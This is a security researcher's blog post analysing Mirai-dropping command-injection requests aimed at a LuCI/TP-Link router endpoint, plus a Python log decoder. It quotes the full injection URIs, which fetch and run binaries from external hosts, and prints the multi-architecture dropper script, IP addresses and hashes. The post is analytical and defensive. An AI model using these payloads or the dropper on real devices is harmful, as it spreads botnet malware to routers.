by Fred Theilig – @fmtheilig
I wrote the majority of this about a year ago and it sat in my drafts folder. I didn’t have the time or the mental energy to fully research the traffic. I started getting more of the same traffic, so I decided to get a move on.
My home server has been pretty quiet as of late. Sometimes because it’s literally quiet. I will shut it down from time to time because the fans will spin up to max and stay there, making one hell of a racket. Shutting it down for a couple of days, or a week, seems to give it the rest it needs to behave better. But also, I just haven’t seen anything.
At ten past one on May 16th I got two Suricata alerts: “ET HUNTING Suspicious Chmod Usage in URI (Inbound)”. The target was my web server and the source IP addresses were 195.1.144.109 and 195.1.144.107, both in Oslo, Norway. The Apache logs showed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)
This /cgi-bin/luci/ is new to me, but let’s decode the stuff between the parens:
cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shk
Now let’s take a look at this dropper:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
What this does is loop over ten architecture builds of the payload (MIPS big- and little-endian, x86, several ARM generations, SH4, PowerPC, ARC) and, for each one: change into /tmp, /var or /dev (whichever it can get into), fetch that build from 103.15.222.150 with wget, curl or tftp, save it as ‘telnetdbot’, chmod 777 it, and run it with the argument the dropper itself was called with (here ‘tplink’). The status= line compares what the binary prints against the string ‘your device just got infected to a bootnoot’ (the backticks that would capture the binary’s output appear to have been lost in formatting). A build for the wrong CPU won’t run and won’t print that, so the loop keeps trying until one does, then stops. Either way the file is deleted right after it is run, so on an infected device the bot survives only as a running process, not as a file. Pretty brute force, but we’ve seen this before. Using tftp is a new one, but it makes sense: no username or password, and BusyBox-based firmware commonly ships a tftp client.
I manually grabbed a copy of the x86 version of this malware. I keep my samples in a folder that clamav ignores. Downloading the version for a different architecture might be better opsec, but I have yet to accidentally run malware on my system. I will hold on to the binary for future analysis. So, what is this telnetdbot that promises to infect me to a “bootnoot”? It’s Mirai, specifically trojan.mirai/aiju.
On June 2nd IP 176.97.210.236 sent some very similar traffic my way:
"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"
This is pretty much the same as before. Besides the IP addresses, the one difference is that the command is now wrapped as id>`...`: the shell has to evaluate the backticked part first to get a file name for id’s output, so the dropper chain runs exactly as it did inside a bare $( ... ). Let’s take a closer look at the target of the GET request. Apparently /cgi-bin/luci/ is LuCI WebUI, the web configuration interface for OpenWrt.
OpenWrt is an open source firmware project principally for replacing router operating systems on many brain-dead consumer routers, giving you much more power and control. I ran this prior to moving to pfSense. I had not heard of the LuCI WebUI before.
I grabbed this payload and of course it too is Mirai, but with a different hash. The shk dropper is run with ‘tplink’ as a parameter, which it passes on to the actual malware binary (the $1 in the script above). TP-Link is a manufacturer of low-end home routers, the kind one may install OpenWrt on, and probably should. The ‘tplink’ argument and the country form in the URI suggest these requests are aimed at TP-Link’s factory firmware, which uses a LuCI-derived web interface, rather than at a stock OpenWrt install.
Let’s look at the numbers for the May 16 event:
195.1.144.109 Oslo, Norway (GlobalConnect AS)
195.1.144.107 Oslo, Norway (GlobalConnect AS)
103.15.222.150 Vietnam (TAN THANH AN INTERNATIONAL TRADE DEVELOPMENT COMPANY LIMITED)
Telnetdbot SHA256: 283a9d3db3201f027ff81ace1b3daca94ec6cdbd6cde3ca5154fb01053f854b2
First Submission: May 16
And now for June 2:
176.97.210.236 Frankfurt am Main, Hesse, Germany
176.97.210.238 Frankfurt am Main, Hesse, Germany
Telnetdbot SHA256: 29866f6d51987d93baadb3478ef1c2ae91172d1d74e1bbeaf7ea8d4efaf8da8d
First Submission: May 31
My Takeaway:
First, if you are not using CyberChef, you are missing out. It comes built in with my Security Onion instance, but you can easily run it locally or just use the hosted version. It decodes obfuscated text like a champ.
Second, it is surprising how fresh these specific samples are. Going by the first-submission dates above, the first one hit my server on the day it was first seen and the second three days after.
Perhaps most importantly, the LuCI configuration interface is a thing and it might still have a vulnerability. Don’t present the web interface to the public network. The Mirai binaries are pretty new, but is the vector of attack? Had I not a full time job, and a full time life outside of my job, I might have stood up an OpenWRT instance with LuCI to have a look. Can you run OpenWRT in a VM? I feel like this should be possible.
If you run LuCI on OpenWRT, or a TP-Link router on its factory firmware, take care. Update to the latest release, don’t present the web interface to the open internet, and verify that you haven’t been ‘infected to a bootnoot’. Because the dropper deletes the binary as soon as it has run, don’t expect to find a file named telnetdbot; look instead for an unfamiliar process that was started from /tmp, /var or /dev, and for connections to the download hosts listed above.
Present Day Fred:
I got the same type of traffic several times over two or three days. Here is what I captured:
141.98.11.137 - - [05/May/2025:04:46:53 -0400] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 15527 "-" "Go-http-client/1.1"
Deobfuscated and formatted:
cd /tmp
rm -rf r
wget http://176.65.148.234/r
chmod 777 r
./r tplink
rm -rf r
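Here is the same decoding done in code rather than in CyberChef, covering all three requests quoted above (May 16, June 2 and the May 2025 one). This is an added example, not code from the original post or from any tool it mentions: it pulls the injected country parameter out of an Apache log line, URL-decodes it, peels off the $( ) and id>` ` wrappers, splits the command chain into its steps, and lists the download host, the dropped file name and the argument the dropper is run with. The sample lines are reconstructed from the requests above (ASCII quotes, plus one benign line added as a control) and the function names are my own.

```python
"""Decode the LuCI/TP-Link 'country' command injection seen in the post and
extract indicators from it. Added example; not code from the original post."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample input: the three requests quoted in the post (ASCII
# quotes instead of the blog's curly ones) plus one benign line as a control.
SAMPLE_LINES = [
    "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)",
    '"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"',
    '141.98.11.137 - - [05/May/2025:04:46:53 -0400] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 15527 "-" "Go-http-client/1.1"',
    '10.0.0.5 - - [05/May/2025:04:50:00 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

URI_RE = re.compile(r"(/cgi-bin/luci/;stok=\S*)")      # the abused endpoint
URL_RE = re.compile(r"https?://[^\s;`'\")]+")           # download URLs in the chain


def query_param(uri, name):
    """Decoded value of one query parameter: the CyberChef 'URL Decode' step.
    '+' becomes a space and %XX escapes are decoded; splitting only on '&'
    keeps the ';' command separators inside the value intact."""
    for pair in uri.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def unwrap_injection(value):
    """Peel the substitution wrappers: $( ... ), `...`, and the id>`...` form.
    In that last form the shell must evaluate the backticks first to get a
    file name for id's output, so the dropper chain runs just as it does
    inside a bare $( ... )."""
    cmd = value.strip()
    while True:
        if cmd.startswith("$(") and cmd.endswith(")"):
            cmd = cmd[2:-1].strip()
        elif cmd.startswith("id>`") and cmd.endswith("`"):
            cmd = cmd[4:-1].strip()
        elif cmd.startswith("`") and cmd.endswith("`"):
            cmd = cmd[1:-1].strip()
        else:
            return cmd


def indicators(steps):
    """Pull the download URL(s), dropped file name and run argument out of
    the individual commands of the chain."""
    urls, dropped, run_arg = [], None, None
    for step in steps:
        urls += URL_RE.findall(step)
        m = re.match(r"chmod\s+\S+\s+(\S+)$", step)
        if m:
            dropped = m.group(1)
        m = re.match(r"\./(\S+)\s*(.*)$", step)
        if m:
            run_arg = m.group(2) or None
    hosts = [urlsplit(u).hostname for u in urls]
    return {"urls": urls, "hosts": hosts, "dropped_file": dropped, "run_arg": run_arg}


def analyze(line):
    """Return a dict describing the injection in one log line, or None if the
    line does not carry a substitution in the 'country' parameter."""
    m = URI_RE.search(line)
    if not m:
        return None
    uri = m.group(1)
    raw = query_param(uri, "country")
    if raw is None or not ("$(" in raw or "`" in raw):
        return None
    command = unwrap_injection(raw)
    steps = [s.strip() for s in command.split(";") if s.strip()]
    result = {"uri": uri, "injected": raw, "command": command, "steps": steps}
    result.update(indicators(steps))
    return result


def scan(lines):
    """Run analyze() over a log and keep only the hits."""
    return [r for r in map(analyze, lines) if r]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("dropper host(s):", hit["hosts"], "file:", hit["dropped_file"],
              "arg:", hit["run_arg"])
        for step in hit["steps"]:
            print("   ", step)
```

Feed scan() your real access log and the hits give you the download hosts to block and the file names to hunt for; the benign control line is dropped because the endpoint regex never matches it. The wrapper-peeling loop is what keeps the June and May 2025 variants from slipping past a decoder written for the bare $( ... ) form.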
The dropper code is basically the same as above except for minor changes and it does away with that bootnoot nonsense. The final binary is again a variant of Mirai. Now for the IP addresses:
Source traffic: 141.98.11.137 – Vilnius, Vilnius City Municipality, Lithuania (UAB Host Baltic)
Dropper location: 176.65.148.234 – The Netherlands (Pfcloud UG)
Malware location: 212.81.47.226 – Sydney, New South Wales, Australia (Datacamp Limited)
Mirai SHA256:
071d1efd8562b639963130523730599daebcf1fbf9eb23afd214467f7cd0edff
So, my new conclusions are that as Mirai evolves, the attack stays mostly the same. Also, I really need to get to studying malware analysis. And finally, CyberChef is awesome. The internet is a shady neighborhood. Be careful out there.